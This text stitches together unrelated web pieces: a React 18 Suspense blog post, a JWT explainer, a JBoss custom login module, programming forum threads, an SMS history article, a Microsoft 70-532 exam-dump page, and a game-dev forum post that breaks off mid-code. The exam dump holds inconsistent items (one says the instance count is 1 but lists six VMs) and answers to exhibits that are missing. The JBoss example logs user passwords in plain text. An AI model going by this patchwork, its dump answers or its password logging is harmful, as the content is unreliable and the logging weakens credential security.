Preface: I hope this article is understandable to everyone, but some basic knowledge of modern JavaScript, React (with React Hooks), and asynchronous operations (with Promises) might be required.
Introduction
I started writing yet another static site generator more than 2 years ago now. I discovered MDX, which seemed like the ideal format to write in for me, as it combines the simplicity of Markdown with inline React components for more expressive HTML. The existing (static) site generators that used it didn't seem great to me though, and site generators are an amazing wheel to reinvent for the umptillionth time... and thus I started writing Shayu.
Somewhere before starting on all that I fully switched to writing all my React with the Hooks syntax, and for simplicity that's the only type of React component I'll mention in this article. I hope to write a simple React (Hooks) primer somewhere in the near future, which I'll link here and probably distribute wherever you found this article as well. React's own documentation also describes them reasonably well.
A basic static site generator
Scaffolding out a basic ssg that supported MDX rendering wasn't too hard;
Parts of this tech stack are opinionated and arbitrary, it's modelled after the various libraries I already use in other projects, and am quite happy with.
Rather quickly though I wanted to fly even closer to the sun: how could a component used by the MDX page make use of asynchronous data? A page or template could then include a component that fetches a Mastodon profile's info, or rely on async filesystem operations to process data before showing it.
React and Asynchronicity
React renders a tree of 'components', where all of them can return more components or plain HTML, or a mix. It starts at the root component passed to the render call, and follows its returns until everything is rendered once, and then updates the page's HTML to match the outputs. On the client side, React components are then strategically re-rendered as their inputs change, to result in updated HTML for the user.
When using React as a server-side renderer it's simpler though: the tree is rendered once, and the HTML is returned. It's a great way to generate HTML for users, as React is much more flexible and expressive than trivial (string-replacement) template engines. If you combine it with React on the client you can also do some awesome 'Hydration', where the client's React takes the server's render as a starting point for further updates. It's thus also perfect for a static site generator, which takes the set of inputs, renders it, then stores the resulting HTML as a file which can then be served by any static webserver.
A React component is a synchronous function: your component gets called with a set of arguments (props) and is expected to return HTML, or more React components (which you supply the props to) to continue rendering. This works great if you immediately know what you want to render as a result, but in more complex components you might have to wait on operations that take a while to complete, like filesystem or network calls.
In client-side React that's not an issue: on first render you can start your asynchronous operation, and immediately return a temporary render result, like a loading spinner or just null. When your async operation returns, you can update the component's state, which tells React it has to re-render your component with the updated info, where you can then return your result as HTML.
It's a lot trickier with the server-sides single render methods though: you can start a Promise and when it returns set state, but there will never be another render with that new data, because the only render pass has already finished (resulting in your fun spinner component, and nothing else). So that's the problem statement I started working on with Shayu.
I wrote about my approach a while back, but didn't really finish it and wasn't too happy with the article and its proposed solution. Its options boiled down to the following:
Separate component and fetcher
Keep the component and its asynchronous data fetching separate: execute the fetcher, then render the component once all the promises have a result. This is the simplest option, but I really didn't like the ergonomics, because suddenly your import is no longer a standard React component, but a custom Object/Array that combines it with a fetcher function. It was also impossible to use the props, given to the component when used on the page, in the fetching function, so you're basically limited to unique components and can't reuse them with different options.
useServerEffect
Emulating the way a client-side component would deal with asynchronous fetching. An initial render pass is done (single renderToStaticMarkup), which captures the promises passed to useServerEffect calls (API modelled after React.useEffect()). Once the promises are finished, execute another render pass. This relies on storing React's State for the component (which is where the Promise result is stored + retreived from) out of band, because as far as React is concerned these renders are entirely separate and start with a blank slate.
Matching that state to the proper component on second render turned out to be rather tricky, but maybe it could've worked, resulting in a barebones double-render setup that can deal with basic asynchronous data on the server (or static site generator) side. It was interesting to dive into React's internals and reverse-engineer the useState mechanism (something that really deserves its own post), but I just couldn't get it to work reliably.
Other, newer projects grabbed my attention, and for a while I kind of gave up. My site used an <Img/> component that asynchronously fetched the image's height+width either from disk or network, to provide a properly sized placeholder, but I didn't use asynchronous components for more than that, because they were too fragile.
New revelations: React 18
Then finally something happened: React v18.0 released and with it came ‘Suspense in Data Frameworks’. The announcement is rather vague, but this turned out to really be the missing piece for Shayu.
In React 18, you can start using Suspense for data fetching in opinionated frameworks like Relay, Next.js, Hydrogen, or Remix. Ad hoc data fetching with Suspense is technically possible, but still not recommended as a general strategy.
While promising, implementation was definitely left as an exercise to the reader, stating
In the future, we may expose additional primitives that could make it easier to access your data with Suspense, perhaps without the use of an opinionated framework.
But I want it now! No, yesterday!
The Suspense is killing me
Digging through the React documentation, not much was to be found, except "New Suspense SSR Architecture in React 18 #37". I still haven't read the extensive explanation, but it had a very useful CodeSandbox demo. It took some time to digest, but in the end the implementation is rather simple and oh so elegant.
Before implementing it in Shayu I wrote a stand-alone demo that was simpler than the CodeSandbox source.
Here are its parts:
Component calls useData
function MyComponent() {
  let data = useData(() => {
    return new Promise((res) => {
      setTimeout(() => {
        console.log("finished");
        res("My Promised return.");
      }, 1000);
    })
  });

  return (
    <span>
      I'm an asynchronous component, and I waited for {data}
    </span>
  );
}
Rendered output: I'm an asynchronous component, and I waited for My Promised return.
It passes a function that'll return the desired Promise, which in turn eventually resolves with the data the component is waiting on
useData function
The useData function is pretty wild, accessing a Context that Shayu wraps around the entire render tree.
function useData(promise) {
  return React.useContext(ShayuContext).get(React.useId(), promise);
}
It uses React.useId() (also new in v18.0) as a key which will remain consistent across renders of this component, and passes the promise-returning function along to
The Context
The Context element sits at the very base of the tree, allowing any downstream component to access it for keeping track of Promises:
function TopLevel() {
  return (
    <ShayuContext.Provider value={contextData}>
      <div>
        <MyComponent/>
      </div>
    </ShayuContext.Provider>
  );
}
contextData is where the real logic is:
let cache = new Map();

let contextData = {
  get(id, promise) {
    if (cache.has(id)) {
      console.log("retrieving", id);
      let entry = cache.get(id);
      if (entry.done) {
        return entry.result;
      } else {
        // unknown edge-case
        console.log("promise accessed again but not finished yet?");
        throw entry.promise;
      }
    } else {
      console.log("starting", id);
      let entry = { promise: promise() };
      entry.promise.then((res) => {
        entry.result = res;
        entry.done = true;
      });
      cache.set(id, entry);
      throw entry.promise;
    }
  }
};
If the key has not been accessed before, it starts the Promise function provided, storing it in the cache with the provided key. Most importantly it then throws the promise, which signals to React to Suspend this part of the render. Once the Promise resolves, React re-renders the originating component, which accesses the cache again, this time returning the result.
Implementing this in Shayu cleaned up the code a lot, as there's no need to keep track of React State ourselves, nor to do a double render. The resulting merge was great: commit
Errors?
A last thing I initially forgot was handling rejected promises. React still ends the Suspense and the component would try to fetch the data again with the same key, but the promise wouldn't be marked as done yet, so not good. It resulted in the "promise accessed again but not finished yet?" looping over and over again.
Shayu now catches any remaining errors on the Promise and will log a warning about it, but components are really expected to do their own error handling on the Promise, because they will still continue to execute albeit without the expected return value.
function MyAdventure() {
  let data = useData(() => {
    return new Promise((res) => {
      setTimeout(() => {
        res("My Promised return.");
      }, 1000);
      throw new Error();
    }).catch((e) => {
      return "nothing!";
    })
  });

  return (
    <span>
      I'm an asynchronous component, and I waited for {data}
    </span>
  );
}
Rendered output: I'm an asynchronous component, and I waited for nothing!
Future plans
With Suspense asynchronous React works super nicely in Shayu, although it still needs some more testing. The code is much more elegant, and way less fragile. Suspending components can also return more suspending components as needed, instead of being limited to 2 single renders.
A new frontier for Shayu will be investigating how to make the static site generator less 'static', instead re-running (some special) components on either the server or client, to provide even more options for dynamic content.
Hello.
I'm a fairly new user of MapPoint 2002 and I am trying to create a state map and save it as a web page so that the counties are clickable. In other words, I need MapPoint to create the HTML imagemap with polygon-shaped areas. From reading the extensive help, it seems it should do this if I have MapPoint create hyperlinks by selecting the third option on the hyperlink tab (and supplying a hyperlink template) in the properties for the data I imported. It doesn't create the imagemap, though. Is there something obvious I'm doing wrong? Is MapPoint 2002 supposed to do what I described? Are there some known bugs that I'm bumping into?
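For clarity, this is roughly the markup I'm expecting MapPoint to emit — a sketch with an invented county name, coordinates, and URL:

<img src="state-map.gif" usemap="#counties" alt="State map">
<map name="counties">
  <!-- one polygon area per county, each pointing at the hyperlink template URL -->
  <area shape="poly" coords="120,40,160,55,150,90,110,80"
        href="http://example.com/county/adams" alt="Adams County">
</map>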
Thanks,
-- najones
What is JWT Authentication & How Do You Use It With Amplication?
Authentication · Open Source · Technical
Moshe Forman
Mar 23, 2022
JSON Web Token (JWT) is now supported by Amplication, the open source platform for Node.js app development.
This article gives you an overview of how JWT works and how you can use it in your Amplication-generated app.
What is JWT Authentication?
JWT is an open standard security token that transmits information securely as a JSON object, useful for authorization and information exchange. It contains all essential information about an entity, meaning that no database queries are necessary, and the session doesn’t need to be saved on the server. You can sign the token using a private secret or a public/private key. Its short messages can be encrypted and securely convey the identity of the sender and whether they have the necessary access rights.
Note: Most programming languages have a library for generating JWT, so you don’t have to do it manually.
JWT structure
JWT contains three parts: Header, Payload, and Signature, as described in the following sections.
JSON Web Token Header
The header provides information about the type of token and the signing/encryption algorithm being used.
The header typically consists of two parts:
• alg - the signing algorithm used, such as HMAC SHA256 or RSA
• typ - the type of token (which is JWT)
{
"alg": "HS256",
"typ": "JWT"
}
JWT Payload
The payload contains the claims. Claims are statements about an entity (typically, the user) and additional data. There are three classes of claim names: Registered, Public, and Private.
Registered claims
Registered claims are defined by the JWT specification. JWT defines a set of seven reserved claims that are not obligatory, but it is recommended that you use them to allow interoperability with third-party applications.
Note: Public claims and private claims are both considered custom claims, created to share information between parties that agree to use them.
Public claims
You can define public claims however you want, but to avoid collisions they should be defined in the IANA JSON Web Token Registry.
Private claims
You can create private claims to share information specific to your application. Unlike public claims, private claims might collide as they are not registered, so use them with care. Private claims should not share names with registered or public claims.
The following example includes a private claim loggedInAs, and a registered claim iat.
{
"loggedInAs": "admin",
"iat": 1422779638
}
Signature in JSON Web Token
The signature is used to verify that the message wasn’t changed in transit. If the token is signed with a private key, it can also verify the identity of the sender. To create the signature part, sign the encoded header, the encoded payload, a secret, and the algorithm specified in the header. The following example uses the HMAC SHA256 algorithm:
HMAC_SHA256(
secret,
base64urlEncoding(header) + '.' +
base64urlEncoding(payload)
)
JWT workflow
Users have only indirect contact with the token, for example, when they enter usernames and passwords. The actual communication takes place between the client and the server.
Before using JWT, you must define a secret key. As soon as a user has successfully entered their login information, the JWT will be returned with the key and saved locally. This transfer should take place over HTTPS to ensure that the data is protected. These steps are described as follows:
1. The user logs in to the client using a username and password.
2. The server checks if the hashed password is the same as the hashed password stored in the database for this user.
3. If the hashed passwords are the same, the JWT service in the server stores the data in the JWT payload section and signs it.
4. The server sends the signed JWT to the client, and the client saves it locally.
5. The next time the user sends a request for data, the client sends the token to the server in the authorization header of the HTTP request using the Bearer scheme.
What is a bearer token?
Bearer authentication is an HTTP authentication scheme using Bearer tokens, so-named because it gives access to the bearer of the token. The Bearer token is a cryptic string, usually generated by the server in response to a login request. The client must send this token in the Authorization header when making requests to protected resources. After a user has been authenticated, the application validates the user’s Bearer token.
You must provide the token using the Header, Body, or Query.
This example shows you how to set the value of the authorization header as Bearer:
Authorization : Bearer cn389ncoiwuencr
If you want to send the token in the body or as a query, add access_token to your required option, for example:
{
"access_token": "eyJhb...",
"token_type": "Bearer",
"expires_in": 3600
}
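As an illustration of validating the Bearer scheme on the server, here is a hypothetical Express middleware sketch (it reuses the jwt and secret from the earlier example; none of this is Amplication-specific):

function requireAuth(req, res, next) {
  const header = req.headers.authorization || "";
  const [scheme, token] = header.split(" ");

  if (scheme !== "Bearer" || !token) {
    return res.status(401).json({ error: "Missing bearer token" });
  }

  try {
    req.user = jwt.verify(token, secret); // attach the decoded claims to the request
    next();
  } catch (err) {
    res.status(401).json({ error: "Invalid or expired token" });
  }
}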
Selecting JWT as the authentication method in Amplication
Support for JWT authentication is built-in to Amplication.
To select JWT authorization for your Amplication app, go to your project dashboard, select Auth Settings and choose JWT from the dropdown list.
Select JWT Authentication
Getting more information about using JWT in Amplication
For more details about using JWT in Amplication, check out the Authentication article in Amplication Docs.
Get the full story
This has been just a quick overview of JWT. If you want the full picture these other sites:
Auth0 - JSON Web Tokens
Wikipedia - JSON Web Token
flaviocopes - JSON Web Token (JWT) Explained
Mozilla – Authentication Schemes
JSON Web Token - IETF
Bearer Token Usage - IETF
ionos – JSON Web Tokens
16.2.2. Custom LoginModule Example
The following information will help you to create a custom Login Module example that extends the UsernamePasswordLoginModule and obtains a user's password and role names from a JNDI lookup.
At the end of this section you will have created a custom JNDI context login module that will return a user's password if you perform a lookup on the context using a name of the form password/<username> (where <username> is the current user being authenticated). Similarly, a lookup of the form roles/<username> returns the requested user's roles.
Example 16.17, “JndiUserAndPass Custom Login Module” shows the source code for the JndiUserAndPass custom login module.
Note that because this extends the JBoss UsernamePasswordLoginModule, all JndiUserAndPass does is obtain the user's password and roles from the JNDI store. The JndiUserAndPass does not interact with the JAAS LoginModule operations.
Example 16.17. JndiUserAndPass Custom Login Module
package org.jboss.book.security.ex2;
import java.security.acl.Group;
import java.util.Map;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import javax.security.auth.Subject;
import javax.security.auth.callback.CallbackHandler;
import javax.security.auth.login.LoginException;
import org.jboss.security.SimpleGroup;
import org.jboss.security.SimplePrincipal;
import org.jboss.security.auth.spi.UsernamePasswordLoginModule;
/**
* An example custom login module that obtains passwords and roles
* for a user from a JNDI lookup.
*
* @author [email protected]
* @version $Revision: 1.4 $
*/
public class JndiUserAndPass
extends UsernamePasswordLoginModule
{
/** The JNDI name to the context that handles the password/username lookup */
private String userPathPrefix;
/** The JNDI name to the context that handles the roles/username lookup */
private String rolesPathPrefix;
/**
* Override to obtain the userPathPrefix and rolesPathPrefix options.
*/
public void initialize(Subject subject, CallbackHandler callbackHandler,
Map sharedState, Map options)
{
super.initialize(subject, callbackHandler, sharedState, options);
userPathPrefix = (String) options.get("userPathPrefix");
rolesPathPrefix = (String) options.get("rolesPathPrefix");
}
/**
* Get the roles the current user belongs to by querying the
* rolesPathPrefix + '/' + super.getUsername() JNDI location.
*/
protected Group[] getRoleSets() throws LoginException
{
try {
InitialContext ctx = new InitialContext();
String rolesPath = rolesPathPrefix + '/' + super.getUsername();
String[] roles = (String[]) ctx.lookup(rolesPath);
Group[] groups = {new SimpleGroup("Roles")};
log.info("Getting roles for user="+super.getUsername());
for(int r = 0; r < roles.length; r ++) {
SimplePrincipal role = new SimplePrincipal(roles[r]);
log.info("Found role="+roles[r]);
groups[0].addMember(role);
}
return groups;
} catch(NamingException e) {
log.error("Failed to obtain groups for user=" + super.getUsername(), e);
throw new LoginException(e.toString(true));
}
}
/**
* Get the password of the current user by querying the
* userPathPrefix + '/' + super.getUsername() JNDI location.
*/
protected String getUsersPassword()
throws LoginException
{
try {
InitialContext ctx = new InitialContext();
String userPath = userPathPrefix + '/' + super.getUsername();
log.info("Getting password for user="+super.getUsername());
String passwd = (String) ctx.lookup(userPath);
log.info("Found password="+passwd);
return passwd;
} catch(NamingException e) {
log.error("Failed to obtain password for user=" + super.getUsername(), e);
throw new LoginException(e.toString(true));
}
}
}
The details of the JNDI store are found in the org.jboss.book.security.ex2.service.JndiStore MBean. This service binds an ObjectFactory that returns a javax.naming.Context proxy into JNDI. The proxy handles lookup operations done against it by checking the prefix of the lookup name against password and roles.
When the name begins with password, a user's password is being requested. When the name begins with roles the user's roles are being requested. The example implementation always returns a password of theduke and an array of roles names equal to {"TheDuke", "Echo"} regardless of what the user name is. You can experiment with other implementations as you wish.
The example code includes a simple session bean for testing the custom login module. To build, deploy and run the example, execute the following command in the examples directory.
[examples]$ ant -Dchap=security -Dex=2 run-example
...
run-example2:
[echo] Waiting for 5 seconds for deploy...
[java] [INFO,ExClient] Login with user name=jduke, password=theduke
[java] [INFO,ExClient] Looking up EchoBean2
[java] [INFO,ExClient] Created Echo
[java] [INFO,ExClient] Echo.echo('Hello') = Hello
The choice of using the JndiUserAndPass custom login module for the server side authentication of the user is determined by the login configuration for the example security domain. The EJB JAR META-INF/jboss.xml descriptor sets the security domain.
<?xml version="1.0"?>
<jboss>
<security-domain>security-ex2</security-domain>
</jboss>
The SAR META-INF/login-config.xml descriptor defines the login module configuration.
<application-policy name = "security-ex2">
<authentication>
<login-module code="org.jboss.book.security.ex2.JndiUserAndPass" flag="required">
<module-option name="userPathPrefix">/security/store/password</module-option>
<module-option name="rolesPathPrefix">/security/store/roles</module-option>
</login-module>
</authentication>
</application-policy>
I am using Play 2.1.1 with Scala. I want to be able to serialize an object into a single value so that I can toss them into a list and have it output an array of this object. I only want it to output entry.document.
import play.api.db._
import anorm._
import anorm.SqlParser._
import play.api.Play.current
import java.sql.ResultSet
import play.api.libs.json._
import play.api.libs.json.Json.toJson
import play.api.libs.functional.syntax._
import play.api.libs.json.JsValue
implicit val searchEntryWrites = new Writes[SearchEntry] {
def writes(entry: SearchEntry): JsValue = {
Json.obj(
toJson(entry.document)
)
}
}
entry.document is actually already JSON. I have figured out how to get this to compile but the output is escaped json instead of just json. Any thoughts?
What's the type of SearchEntry.document? Or, could you add the definition of SearchEntry to your question? Just the (case) class, not the companion object (if you have one). – Carsten May 16 '13 at 21:52
Could you also include the imports and what the compiler exception is too? – cmbaxter May 17 '13 at 0:15
1 Answer
Not sure if you can do it like that without first parsing the values with the Play JSON library, so that you will have a JsObject representation of the JSON in entry.document.
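That parsing approach might look like the following sketch (assuming entry.document is a String containing valid JSON):

implicit val searchEntryWrites = new Writes[SearchEntry] {
  def writes(entry: SearchEntry): JsValue =
    Json.parse(entry.document) // re-parsed, so it is emitted as JSON rather than an escaped string
}

With that in place, Json.toJson(listOfEntries) should produce a plain JSON array of the documents.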
Maybe it would be better to not parse it and just build the JSON string yourself in this case? Something like:
Ok("[" + entries.mkString(",") + "]").as("text/json")
September 10, 2024
Short Message Service, better known as SMS, has transformed the way we communicate, becoming a cornerstone of modern messaging. Since its inception in the 1980s, SMS has undergone a remarkable evolution, shaping the digital landscape and revolutionizing personal and professional interactions worldwide.
The Birth of SMS
SMS traces its origins to the early 1980s when Friedhelm Hillebrand and Bernard Ghillebaert first conceptualized the idea of sending short messages over the cellular network. The concept was simple yet groundbreaking: to create a system that could transmit small, text-based messages between mobile devices.
Rapid Adoption and Global Reach
SMS was initially seen as a niche feature, with limited functionality and high costs. However, as mobile technology advanced, SMS quickly gained popularity due to its simplicity, affordability, and ease of use. By the late 1990s and early 2000s, SMS had become a ubiquitous communication tool, transcending geographical boundaries and language barriers.
The SMS Revolution
The widespread adoption of SMS had a profound impact on communication patterns and behaviors. SMS offered a convenient way to send quick messages, enabling people to stay connected in real-time. Its popularity soared, surpassing traditional methods of communication such as emails and phone calls, particularly among younger generations.
Business and Social Impact
SMS revolutionized not only personal communication but also business interactions. It provided a new channel for businesses to engage with customers, offering services such as notifications, alerts, and marketing messages. SMS also played a crucial role in emergency communications, enabling authorities to quickly disseminate important information during crises.
Challenges and Innovations
Despite its success, SMS has faced challenges, particularly from emerging messaging apps and services. These platforms offer more features, such as multimedia messaging and group chats, challenging SMS’s dominance. However, SMS remains a reliable and widely used communication tool, especially in regions with limited internet access or smartphone penetration.
Looking Ahead
As we look to the future, SMS continues to evolve, adapting to changing communication trends and technologies. Rich Communication Services (RCS) is one such evolution, offering enhanced features similar to those found in messaging apps. RCS aims to provide a more interactive and engaging messaging experience, ensuring that SMS remains relevant in an increasingly connected world.
Conclusion
From its humble beginnings to its current status as a global communication standard, SMS has come a long way. Its simplicity, affordability, and reliability have made it a mainstay of modern communication, transcending borders and connecting people around the world. As technology continues to advance, SMS will undoubtedly continue to evolve, shaping the way we communicate for years to come.
[Free] 2018(July) Ensurepass Microsoft 70-532 Dumps with VCE and PDF 151-160
Ensurepass.com : Ensure you pass the IT Exams
2018 July Microsoft Official New Released 70-532
100% Free Download! 100% Pass Guaranteed!
Developing Microsoft Azure Solutions
Question No: 151 HOTSPOT – (Topic 5)
You store JSON data in a blob by using the Azure Blob service. Web applications access the JSON data by using client-side JavaScript calls.
JSON data is stored in a container that is configured to allow anonymous access. Web applications that are allowed to make updates to the data have access to any necessary shared access signatures (SASs) and storage keys.
You configure one Cross-Origin Resource Sharing (CORS) rule for the https://fabrikam.com domain and then run the following method. Line numbers are provided for reference only.
(exhibit image)
For each of the following statements, select Yes if the statement is true. Otherwise, select No.
(exhibit image)
Answer:
(exhibit image)
Question No: 152 – (Topic 5)
You are designing a Windows Azure application.
The application will store data in Windows Azure Blob storage. Many of the application services will be interdependent.
You need to recommend an approach for optimizing the performance of the application. What should you recommend?
1. Create one affinity group. Associate only the storage services with the affinity group.
2. Create one affinity group. Associate only the compute services with the affinity group.
3. Create one affinity group. Associate the compute services and storage services with the affinity group.
4. Create two affinity groups. Associate the compute services with one group and the storage services with the other group.
Answer: C Explanation:
Use the following procedures to create an affinity group, which can be used to direct Windows Azure storage accounts and hosted services to the same geographical grouping within a specified region. Each affinity group is associated with a Windows Azure subscription, and can be used by multiple storage accounts and hosted services for that subscription.
Affinity groups can be created and managed by the service administrator and co- administrators for a subscription.
Question No: 153 – (Topic 5)
You deploy a website to Azure. When the website starts, it loads and caches common data.
Updates to the website must occur without downtime or performance degradation that is noticeable to users.
You need to upgrade to a new version of website code.
What should you do?
(exhibit image)
1. Option A
2. Option B
3. Option C
4. Option D
Answer: B
Question No: 154 – (Topic 5)
Which of the following is the logical progression in internal private cloud adoption?
1. Virtualize, PaaS, IaaS and SaaS
2. SaaS, PaaS, IaaS and Virtualize
3. Virtualize, IaaS, PaaS and SaaS
4. IaaS, PaaS, Virtualize and SaaS
Answer: C Explanation:
Cloud computing service models arranged as layers in a stack.
(figure)
References: https://en.wikipedia.org/wiki/Cloud_computing#Service_models
Question No: 155 – (Topic 5)
Which of the following statements are correct for submitting operations in a batch? (Choose three.)
1. All operations have to be in the same partition.
2. Total batch size can’t be greater than 4 MB.
3. Max operation count is 100.
4. Minimum operation count is three
Answer: A,B,C
Question No: 156 – (Topic 5)
Companies that are looking to move from capital expenses to operating expenses benefit from cloud services.
1. True
2. False
Answer: A Explanation:
"Capex vs. Opex" refers to the fact that stocking your own data center requires capital expenditure, while using an external cloud service that offers pay-as-you-go service falls into ongoing operating expenditures: thus the contrast of "Capex vs. Opex."
References: http://www.cio.com/article/2430099/virtualization/capex-vs-opex-most- people-miss-the-point-about-cloud-economics.html
Question No: 157 – (Topic 5)
Which of the following is the cloud characteristic that speeds up development, deployment and overall time of market?
1. Rapid elasticity
2. Cloud bursting
3. Universal access
4. Network pooling
Answer: A Explanation:
Rapid elasticity is a cloud computing term for scalable provisioning, or the ability to provide scalable services. Experts point to this kind of scalable model as one of five fundamental aspects of cloud computing.
Rapid elasticity allows users to automatically request additional space in the cloud or other types of services.
References: https://www.techopedia.com/definition/29526/rapid-elasticity
Question No: 158 – (Topic 5)
Note: This question is part of a series of questions that present the same scenario. Each question in the series contains a unique solution that might meet the stated goals. Some question sets might have more than one correct solution, while others might not have a correct solution.
After you answer a question in this section, you will NOT be able to return to it. As a result, these questions will not appear in the review screen.
You deploy a Virtual Machine Scale Set (VMSS) named CorpWebVMSS to Azure by using Azure PowerShell and set the instance count to 1. The VMSS includes a storage account, load balancer, public IP address. and six Standard_A1 Windows virtual machines (VMs) that run Internet Information Services (IIS). All components are deployed to a resource group named CorpWebRG.
You must increase the instance count to support the increased load on IIS. You need to manually scale out the number of VMs in the scale set to 5.
Solution: You deploy the following JSON template by using Azure PowerShell:
(exhibit image: JSON template)
Does the solution meet the goal?
1. Yes
2. No
Answer: A Explanation:
References:
https://docs.microsoft.com/en-us/azure/virtual-machine-scale-sets/virtual-machine-scale- sets-autoscale-overview
Question No: 159 – (Topic 5)
You administer an Access Control Service namespace named contosoACS that is used by a web application. ContosoACS currently utilizes Microsoft and Yahoo accounts.
Several users in your organization have Google accounts and would like to access the web application through ContosoACS.
You need to allow users to access the application by using their Google accounts. What should you do?
1. Register the application directly with Google.
2. Edit the existing Microsoft Account identity provider and update the realm to include Google.
3. Add a new Google identity provider.
4. Add a new WS-Federation identity provider and configure the WS-Federation metadata to point to the Google sign-in URL.
Answer: C Explanation:
Configuring Google as an identity provider eliminates the need to create and manage authentication and identity management mechanism. It helps the end user experience if there are familiar authentication procedures.
References:
http://msdn.microsoft.com/en-us/library/azure/gg185976.aspx
Question No: 160 – (Topic 5)
You are migrating an existing solution to Azure. The solution includes a user interface tier and a database tier. The user interface tier runs on multiple virtual machines (VMs). The user interface tier has a website that uses Node.js. The user interface tier has a background process that uses Python. This background process runs as a scheduled job. The user interface tier is updated frequently. The database tier uses a self-hosted MySQL database.
The user interface tier requires up to 25 CPU cores. You must be able to revert the user interface tier to a previous version if updates to the website cause technical problems. The database requires up to 50 GB of memory. The database must run in a single VM.
You need to deploy the solution to Azure. What should you do first?
A. Deploy the entire solution to an Azure website. Use a web job that runs continuously to host the database.
B. Deploy the database to a VM that runs Windows Server on the Standard tier.
C. Deploy the entire solution to an Azure website. Run the database by using the Azure data management services.
D. Deploy the user interface tier to a VM. Use multiple availability sets to continuously deploy updates from Microsoft Visual Studio Online.
Answer: C
Error updating test.js file
#1
How do I EDIT the package.json file? I've re-read the backend lessons and don't see it. Please advise.
ec2-user:~/workspace $ cat <package.json
{
  "name": "@clear/workspace",
  "version": "1.0.0",
  "main": "index.js",
  "scripts": {
    "test": "node test.js"
  },
  "author": "",
  "license": "ISC",
  "description": "",
  "dependencies": {
    "@linclark/pkg": "^1.0.2"
  }
}
ec2-user:~/workspace $ how-to-npm verify
Could not verify: SyntaxError: /home/ec2-user/workspace/package.json: Unexpected end of JSON input
at Object.parse (native)
at Object.Module._extensions…json (module.js:587:27)
at Module.load (module.js:487:32)
at tryModuleLoad (module.js:446:12)
at Function.Module._load (module.js:438:3)
at Module.require (module.js:497:17)
at require (internal/module.js:20:19)
at Object.exports.verify (/home/ec2-user/.nvm/versions/node/v6.12.3/lib/node_modules/how-to-npm/problems/06-npm-test/index.js:18:12)
at LegacyAdventure.WA.executeExercise (/home/ec2-user/.nvm/versions/node/v6.12.3/lib/node_modules/how-to-npm/node_modules/workshopper-adventure/index.js:425:16)
at LegacyAdventure.WA.process (/home/ec2-user/.nvm/versions/node/v6.12.3/lib/node_modules/how-to-npm/node_modules/workshopper-adventure/index.js:317:17)
#2
I’ve edited your post for readability. When you enter a code block into the forum, remember to precede it with a line of three backticks and follow it with a line of three backticks to make it easier to read. See this post to find the backtick on your keyboard. The “preformatted text” tool in the editor (</>) will also add backticks around text.
I could be wrong, but it appears you are missing an extra } at the end.
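One quick way to check whether the file on disk is actually valid JSON (a sketch, assuming Node is installed) is to parse it directly:

node -e "JSON.parse(require('fs').readFileSync('package.json', 'utf8')); console.log('valid JSON')"

If that throws the same "Unexpected end of JSON input" error, the file on disk differs from what was pasted.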
#3
The curly brace is present in the code. I missed it during copy/paste.
#4
If by EDIT you mean make changes to the package.json file, have you tried a text editor?
What specifically are you wanting to edit?
#5
Thank you for your help. I deleted the package.json and reinstalled it with node test.js entered in the scripts object from the beginning, then created the test.js file. I'm fairly new to all this, but after rereading the prior steps there is no mention of how to create a file, create a directory, or how to edit text in the command line, which can be troublesome for beginners like me.
Additionally, the AWS cloud services site has been updated, and the steps from the video do not reflect the lesson steps. This is the first lesson for the backend, and not being able to follow along with the video is frustrating.
#6
Things like “how to create a file”, “how to create a directory”, and “how to edit a text file” fall under what I would consider knowing how to use your computer. Even if that were within the scope of FCC, it's way too broad and diverse to be doable in any meaningful way.
If you want to do everything from the command line and don't know how, most of what you're talking about is easy to find. “How to edit a file from the command line” is not hard to Google.
#7
I agree that these don’t need to be brought up in the curriculum. A quick Google search tells you all you need to know: mkdir Folder, cd Folder, nano text.txt (see the sketch below). Also, do you not have a text editor? Why are you working in the terminal?
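Spelled out, a minimal terminal session (POSIX shell; the names here are just examples) might look like:

mkdir my-project    # create a directory
cd my-project       # move into it
touch test.js       # create an empty file
nano test.js        # open it in a simple terminal editor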
I’m confused. What does AWS and some video have to do with freeCodeCamp? I was not aware we even had a video tutorial for this let alone using AWS… please correct me if I’m wrong.
#8
The site the video instructions refer to has been altered because AWS bought Cloud9…
Below you’ll find a link to the lesson in question from your site.
You’re making assumptions about beginners even knowing how to phrase a question or the jargon of the command-line interface.
#9
I don’t know a lot about Cloud9. What’s the reason you can’t use it now that it belongs to AWS? Is it just because they want a credit card for the sign-up?
I suppose the reason there aren’t more detailed instructions for using the terminal is that freeCodeCamp assumes you’ll use Cloud9 or some other IDE.
Anyway - you definitely need to know how to use an editor and the command line before you can use Node locally. VS Code is a common choice of editor - as are Atom and Brackets. You probably have at least vi and nano already installed for making simple edits but it’s easier with a more modern interface. You should find a simple introduction to using the command line for whichever OS you have and go through the basics.
Git External merge and difftools: Setting up an IntelliJ IDE as diff tool (Windows)
Example
[diff]
    tool = intellij
    guitool = intellij
[difftool "intellij"]
    path = D:/Program Files (x86)/JetBrains/IntelliJ IDEA 2016.2/bin/idea.bat
    cmd = cmd \"/C D:\\workspace\\tools\\symlink\\idea\\bin\\idea.bat diff $(cd $(dirname "$LOCAL") && pwd)/$(basename "$LOCAL") $(cd $(dirname "$REMOTE") && pwd)/$(basename "$REMOTE")\"
The one gotcha here is that this cmd property does not accept any weird characters in the path. If your IDE's install location has weird characters in it (e.g. it's installed in Program Files (x86)), you'll have to create a symlink, as sketched below.
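For example, on Windows a directory symlink can be created from an elevated command prompt (these paths are illustrative and match the config above):

mklink /D "D:\workspace\tools\symlink\idea" "D:\Program Files (x86)\JetBrains\IntelliJ IDEA 2016.2"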
Handmade Hero»Forums»Code
Jesse Coyle
37 posts
Using vectors to create triangles
Hello everybody, I've been slow in my projects, but on one particular note I've had a bug that I can't find, and it must be squashed, as always.
I've been using vectors to determine the points of a triangle to draw. I have seen a good bit of the basics part of the series and have done a min/max rectangle to limit the portion of the screen in which to check whether pixels are inside the three vector points.
I've done several methods: checking which side the point is on relative to every vector, a barycentric method, and a couple of others. The one I'm currently using seems a good fit, as it doesn't care whether the points go clockwise or counter-clockwise.
The bug comes in when it creates a weird monstrosity triangle like the one
[attachment=43]triangles.png[/attachment]. The purple squares are centered on the point where a vector point is at.
These are the three vectors that are represented by the purple squares
v2 test_v1 = {100, 100};
v2 test_v2 = {150, 100};
v2 test_v3 = {125, 150};
This is a method of seeing if a point is within three vector points.
inline bool32
IsInTriangle(v2 p, v2 p0, v2 p1, v2 p2)
{
    bool32 result = false;
    // Edge vectors from p0, plus the vector from p0 to the test point.
    v2 temp0 = p2 - p0;
    v2 temp1 = p1 - p0;
    v2 temp2 = p - p0;
